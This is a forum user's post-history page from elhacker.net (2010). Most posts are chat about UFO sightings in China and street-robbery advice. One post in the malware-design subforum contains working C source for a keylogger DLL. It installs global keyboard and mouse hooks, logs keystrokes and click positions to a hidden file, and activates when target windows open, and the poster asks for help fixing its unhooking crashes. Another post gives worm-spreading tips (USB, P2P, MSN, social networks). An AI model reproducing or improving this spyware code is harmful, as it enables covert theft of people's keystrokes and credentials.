elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 29
31  Foros Generales / Foro Libre / Re: Ola de Avistamientos ovnis en China ¿Sera una Luz de Venuz?¿o la Aurora Boreal? en: 11 Octubre 2010, 03:02 am
Tercer milenio? Eso es una copia barata de Cuarto Milenio, o me lo parece ami? xq si es asi, ya es triste de cojones

  Hombre el Post es de un hecho puntula que es el aumento de actividad OVNI en China, este post no se llama: "Que tal les parece el programa Tercer Milenio", la verdad que no se mucho de ese programa simplemente lo coloque para rellenar el post, pero decir que los acontecimientos en china son una farsa por que Tercer Milenio los avala me parece de a practicas oscurantistas en la edad media... Si no creen en es eprograma como fuente en google hay mcha tela para cortar desde Diarios Sobrios Exepticos hasta Revistas Fanaticas ...  :P

Tercer milenio? Eso es una copia barata de Cuarto Milenio, o me lo parece ami? xq si es asi, ya es triste de cojones

No es al reves, no ves que el 4 va despues del 3? ahora en serio me recuerda al programa ese de el dia de la bestia XD.

Sinceramente, dudo mucho que nos vengan a ver los extraterestres, lo atribuyo a experimentos militares o otra farsa.

  Puede ser sobre todo el primer video parece mas un lanzamiento de misil, pero la verdad es que ese objeto estaba bastante cerca tanto que los radares del aereopuerto lo detectaron y tuvieron que restringir el trafico en la zona ....

  La segunda foto si ni el mas fanatico del encubrimiento puede negar,  :silbar: Fue a plena luz del dia y el fenomeno duro mas de 10 minutos, Trafico suspendido, vuelos desviados y retrasados e incontable material multimedia recolectado de los testigos ..  :P Unos pueden decir que fue una Aurora Boreal, Otros pueden decir que era un vuelo de un avion experimental chino, otros pueden decir que era la luz de venus reflejada en la luna o algo asi, pero alli estan las pruebas  :P Y decir que es falso por que Tercer Milenio dice que es verdad ¿es algo ilogico no? En mi opinion no creo que la fuerza aerea china valla a probar unos de sus prototipos estrategicos a plena luz del dia y sobrevolando un aereopuerto  :P ....

  La otra duda que me viene es ¿por que no hubo reaccion de parte de la Fuerza Aerea? 10 minutos es una eternidad en los protocolos y planes de reaccion de fuerzas militares .... Lo que enturbia mas el fenomeno ....

  Y si van ha seguir desviando el tema me avisan y le cambio el nombre por algo que mas les guste como "Amarillismo Informativo" o algo asi ....  :P



32  Foros Generales / Foro Libre / Ola de Avistamientos ovnis en China ¿Sera una Luz de Venuz?¿o la Aurora Boreal? en: 9 Octubre 2010, 06:39 am
  Bueno hoy en dia hay una ola de avistamientos Ovnis en china asi como en la decada de los 40 y 50 en USA . Mi hipotesis es que esa gente concentra su estudio en las zonas mas desarrolladas ..... Ya ET sabe que USA no es la principal potencia  :xD .......

 http://www.larazon.es/noticia/5454-senores-pasajeros-cerramos-el-aeropuerto-porque-hemos-visto-un-ovni



 

33  Seguridad Informática / Análisis y Diseño de Malware / Re: Me presento, y de paso... quiero algunos tips sobre gusanos en: 9 Octubre 2010, 04:24 am
Citar
Se como hacer todo lo anterior, salvo la parte de la auto replicacion. Algun tip, o link de interes!??!

  Depende de como te quieras replicar si quieres remotos a montones tienes que hacerlo por redes sociales..... lo demas es sencillo spread usb, P2P, MSN todo no esta en un link  :P
34  Foros Generales / Noticias / Re: Anonymous declara la guerra a la SGAE en: 7 Octubre 2010, 01:01 am
  Estuve hechandole un vistazo al software esta muy bueno jeje  :) ........

 
35  Seguridad Informática / Análisis y Diseño de Malware / Re: Problema con UnHookWindowsEx[SOLUCIONADO] en: 6 Octubre 2010, 22:33 pm
  No sabia que al hacer esto la dll se carga en la memoria de todo los procesos  :-[
entonces, y mi dll aparte de este hook realiza ciertas operaciones dependiendo del ejecutable que la carga  :silbar: incluyendo explorer.exe, iexplorer.exe y firefox.exe  :D por lo que desencadena un caos general   :xD  ....... [SOLUCIONADO] Pueden cerrar el tema   :silbar: ...
36  Programación / Programación C/C++ / Re: Principios básicos del desarrollo de drivers en Windows. en: 6 Octubre 2010, 20:31 pm
  Buen trabajo   ;D
37  Programación / Programación C/C++ / Re: Problemita con FILES en: 6 Octubre 2010, 20:18 pm
Código:
if (pf=NULL)

alli esta el error seria:

Código:
if (pf==NULL)
38  Seguridad Informática / Análisis y Diseño de Malware / Problema con UnHookWindowsEx en: 6 Octubre 2010, 19:49 pm
  Tengo problemas con estas funciones ....

DLL
Código
  1.  
  2. LRESULT CALLBACK Filtro(int nCode, WORD wParam, DWORD lParam) {
  3.                if(nCode<0){
  4.                   return(CallNextHookEx(gancho,nCode,wParam,lParam));
  5.                   }
  6.                if (lParam & (1 << 31)) {
  7.                   char path[MAX_PATH];
  8.                   FILE *datos;
  9.                   BYTE KeyboardState[256];
  10.                   GetKeyboardState(KeyboardState);
  11.                   WORD CharValue;
  12.                   strcpy(path,getenv("USERPROFILE"));
  13.                   strcat(path,"\\Shellx64\\SPACK\\KLG.KL");
  14.                   if(ToAscii(wParam,0,KeyboardState,&CharValue,0) > 0){
  15.                       if((datos=fopen(path,"at"))==NULL){
  16.                                  return CallNextHookEx(gancho,nCode,wParam,lParam);
  17.                                  }
  18.                          fprintf(datos,"%c",(char)CharValue);
  19.                          fclose(datos);
  20.                   }
  21.                }
  22.  
  23.                return CallNextHookEx(gancho,nCode,wParam,lParam);
  24. }
  25. LRESULT CALLBACK FiltroMouse(int nCode, WORD wParam, LPARAM lParam)
  26. {
  27.                if(nCode!=HC_ACTION )
  28.                {
  29.                   return(CallNextHookEx(ganchom,nCode,wParam,lParam));
  30.                   }  
  31.                else
  32.                  switch(wParam)
  33.                       {
  34.                       case WM_LBUTTONDOWN:
  35.                           {
  36.                            PMOUSEHOOKSTRUCT MH=(PMOUSEHOOKSTRUCT)lParam;
  37.                            GuardarPosicion(MH->pt.x,MH->pt.y) ;
  38.                            Sleep(200);
  39.                            break;
  40.                             }
  41.                       default:
  42.                         return CallNextHookEx(ganchom,nCode,wParam,lParam);
  43.                      }
  44.  
  45. return CallNextHookEx(ganchom,nCode,wParam,lParam);
  46. }
  47. EXTERN_C __declspec(dllexport)int CreaHook(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) {
  48.    char path[MAX_PATH];              
  49.      strcpy(path,getenv("USERPROFILE"));
  50.      strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
  51.      FILE *datos;
  52.    if(Instala==TRUE) {
  53.                          LoadDllss();
  54.                          if((datos=fopen(path,"at"))!=NULL)
  55.                          {  
  56.                             fprintf(datos,"%s","IniciandoKL");
  57.                             fprintf(datos,"%s",DIRKL);
  58.                             fclose(datos);
  59.                           }
  60.                          gancho=MySetWindowsHook(WH_KEYBOARD,(HOOKPROC)Filtro,DLLInst,0);
  61.  
  62.                          if(gancho==NULL){
  63.                                 return 0;
  64.                          }
  65.                          else{
  66.                                 return 1;
  67.                          }
  68.                     }else{
  69.                         if((datos=fopen(path,"at"))!=NULL)
  70.                          {  
  71.                             fprintf(datos,"%s","TerminandoKL");
  72.                             fprintf(datos,"%s",DIRKL);
  73.                             fclose(datos);
  74.                           }
  75.                         return UnhookWindowsHookEx(gancho);
  76.  
  77.                   }
  78. }
  79. EXTERN_C __declspec(dllexport)int CreaHookMouse(BOOL Instala, HINSTANCE DLLInst,char* DIRKL) {
  80.       char path[MAX_PATH];              
  81.      strcpy(path,getenv("USERPROFILE"));
  82.      strcat(path,"\\Shellx64\\SPACK\\KLG.KL");  
  83.      FILE *datos;            
  84.                  if(Instala==TRUE) {
  85.                          LoadDllss();
  86.                           if((datos=fopen(path,"at"))!=NULL)
  87.                          {  
  88.                             fprintf(datos,"%s","IniciandoBKER");
  89.                             fprintf(datos,"%s",DIRKL);
  90.                             fclose(datos);
  91.                           }
  92.  
  93.                          ganchom=MySetWindowsHook(WH_MOUSE,(HOOKPROC)FiltroMouse,DLLInst,0);
  94.  
  95.                          if(ganchom==NULL){
  96.                                 return 0;
  97.                          }else{
  98.                                 return 1;
  99.                          }
  100.                   }else{
  101.                         if((datos=fopen(path,"at"))!=NULL)
  102.                          {  
  103.                             fprintf(datos,"%s","TerminandoBKER");
  104.                             fprintf(datos,"%s",DIRKL);
  105.                             fclose(datos);
  106.                           }
  107.                       return UnhookWindowsHookEx(ganchom);
  108.  
  109.                     }
  110. }

main
Código
  1. main()
  2. {
  3. HMODULE Dll=LoadLibraryA(DIRKL);
  4. Funcion = (LPFuncion)GetProcAddress(Dll,"CreaHook");
  5. FuncionM = (LPFuncionM)GetProcAddress(Dll,"CreaHookMouse");
  6. //INY=new Inyector(INFO->Masterdir ,CFS->RTKNAMEdll,INFO->SoyAdm);
  7. int lp=0;
  8. IniciarKeyLog();
  9. bool banana=false,banana1=false;;
  10. while(1)
  11.    {
  12.  
  13. strcpy(LINKK,"NULL");
  14. strcpy(LINKVINS,"NULL");
  15. EnumWindows((WNDENUMPROC)EnumProc1,lp);
  16. if(strcmp(LINKK,"NULL")!=0&&!banana)
  17.   {
  18. banana=true;
  19. FuncionM(TRUE,Dll,LINKK);
  20.   }
  21.     if(strcmp(LINKK,"NULL")==0&&banana)
  22.   {
  23.        banana=false;
  24. FuncionM(FALSE,Dll,LINKK);
  25.   }
  26. if((strcmp(LINKVINS,"NULL")!=0||strcmp(LINKK,"NULL")!=0)&&!banana1)
  27.   {
  28. banana1=true;
  29. Funcion(TRUE,Dll,LINKVINS);
  30.   }
  31.     if((strcmp(LINKVINS,"NULL")==0&&strcmp(LINKK,"NULL")==0)&&banana1)
  32.   {
  33.        banana1=false;
  34. Funcion(FALSE,Dll,LINKVINS);
  35.   }
  36. Crono1++;
  37. Crono2++;
  38.     Sleep(3000);
  39.     }
  40. return 0;
  41. }
  42.  

  El pedaso de codigo del main es un extracto del main principal de mi programa ....
En si lo que intento hacer es detectar ciertas ventanas y si estan activas activar los hooks todo funciona de maravilla pero me interesa que al momento d eno existir ninguna ventana de interes los hooks sean desinstalados... por cuestiones de optimizacion ....... Pero al momento de cerrar la ventana de interes, la aplicacion desinstala los hooks perfectamente, pero explorer.exe, iexplorer.exe y firefox.exe rebotan unos feos errores que los obliga ha cerrar  :( y ya saben el escandalo que se forma cuando se cierra explorer por lo que esto no me sirve  :¬¬ claro despues de reiniciar los serviciso tanto la dll como el exe siguen trabajando sin problemas y los hooks quedan desinstalados .... Se que hay que pulir un hook para que detecte teclas invisibles como TAB, F1 las flechas y todas esas cosas pero primero quiero que los hooks se instalen y desinstalen a la perfeccion.......

Algun Cable?

  Tambien se puede dejar ese puñal alli metido y no deshokearlos  :laugh: pero eso seria mucha data irrelevante ...

 Saludos ....

  Se que esto va en el subforo de c++ pero he obtenido mas ayuda aqui que en ese subforo  :P
39  Foros Generales / Foro Libre / Re: Acabaron de intentado robarm con arma blanca (y me hirieron) recomendaciones :P en: 6 Octubre 2010, 07:18 am
  Jeje la vez pasada te robaron tambien y duraste un tiempo perdido  :) estoy empezando a creer que vives en la Ciudad de Dios  ;-)
  
  Pues usted sabe como son las cosas en latinoamerica aqui el que menos corre vuela y hay mas armas que pan en las calles, correr si te cojen te matan y si logras huir te buscan y te cojen...  :¬¬ ¿Pelear? apostaria tu vida a un evento aleatoria que seria si el villano este armado o no, nada es mas rapido que una bala .... Analizar la situacion y detectar cuando estas a las puertas del matadero tambien seria bueno, si de verdad crees que te van a malograr es mejor luchar....

  Ejemplo: voy por la calle y un automovil se detiene y me secuestra.... me llevan por un sector montañoso en las afueras de la ciudad, y estoy seguro que no es un secuestro... en esta situacion si hay que jugarcela peleando..... Pero si dos gamines te llegan con un cuchillo ha atracar no te enrolles entragale tu cartera.... y listo...  :)
40  Foros Generales / Foro Libre / Re: Se acerca el tiempo de contacto con extraterrestres en: 5 Octubre 2010, 20:27 pm
  El planeta descubierto recientemente, el extraño pulso proveniente de la misma zona, y el extraño nombramiento de la embajadora de la Tierra en el Espacio  :huh: dan la sensacion que las potencias saben algo muy trascendental y que estemos a poco tiempo de algo verdaderamente grande que cambiara al mundo  :)  :o
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 29
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines